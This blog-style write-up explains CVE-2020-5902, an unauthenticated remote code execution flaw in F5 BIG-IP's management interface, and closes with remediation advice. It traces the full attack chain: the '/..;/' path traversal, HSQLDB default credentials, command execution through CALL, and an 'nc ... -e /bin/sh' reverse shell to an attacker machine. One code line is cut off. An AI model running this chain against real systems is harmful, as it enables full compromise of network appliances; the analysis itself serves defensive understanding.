CVE-2020-5902 : RCE on F5 BIG-IP

Mikhail Klyuchnikov from Positives Technologies unveiled the July 2th 2020 a critical vulnerability of remote code execution (RCE) on the trafic management user interface (TMUI) of BIG-IP, the F5 Web Application Firewall.

The CVE get the maximum score CVSS (10) ; at the time of the public disclosure, BIG-IP servers vulnerables and reachables by Internet are estimated to 8000 units.

Parsing logic weakness

BIG-IP server exposes a trafic management web interface (TMUI), powered by a Apache HTTP server, on its port 443.

The configuration file /etc/httpd/conf.d/proxy_ajp.conf establish a list a regular expressions on URL ; if it matches, the request is forwarded to the Tomcat server on the port 8009.

For example, it’s the case for the endpoint /tmui/login.jsp which matches ^/tmui/(.*\.jsp.*)$.

However, while the Apache HTTP server interpret /..;/ as a valid folder name, Tomcat interpret it as the parent folder.

Parsing logic weakness between Apache HTTP Server and Tomcat

Hence, we can ride up the file tree of Tomcat with traversal directory.

We can have all the availables Tomcat ressources with a BIG-IP appliance. They are located at /usr/local/www/tmui/WEB-INF/web.xml.

So, with the traversal directory hack /..;/, while satisfying one of the regular expressions in order to get the request forwarded to Tomcat, we can have any of the Tomcat ressource, without any authentication :

Tomcat Traversal directory

HSQLDB default password

One of the most interesting Tomcat ressources is /hsqldb/. This is the entrypoint of the HyperSQL Database of TMUI.

Unfortunately… HSQLDB got default user and password in its default configuration.

Theses ones can be retrieved by a simple google search : “SA” for the user and "" for the password.

So, with a script connecting to /tmui/login.jsp/..;/hsqldb/ with the default identifiers, we can get access to the database TMUI and do SQL injections, still without any authentication.

HSQLDB to Reverse Shell

In the HSQLDB documentation, we can find a CALL function which can call stored procedures and staticals Java methods.

With CALL, combined to Runtime.getRuntime().exec, we can pass a bash command to the server :

result = stmt.executeQuery("CALL 

So, with putting a port on listening on our attack computer nc -l -p [port], and injecting nc [IP] [port] -e /bin/sh on the BIG-IP server, we connect a shell terminal to our attack computer, and we get - in others words - a reverse shell.

The BIG-IP is then totally compromised.

Remediation / Mitigation

The vulnerability have been transmitted to F5 on Avril 1st 2020.

On July 1th 2020, F5 has released a security advisory and has patched many of his versions with minor releases correcting the vulnerability ; the simpliest being to upgrade to get ride of the vulnerability.

However, if upgrading is not possible, F5 recommend to IP whitelist only the trusted networks, to add 404 redirections if URL contains ; or hsqldb, or to disable TMUI.

Find the complete article from Mikhail Klyuchnikov, technical expert from Positive Technologies, about the vulnerability :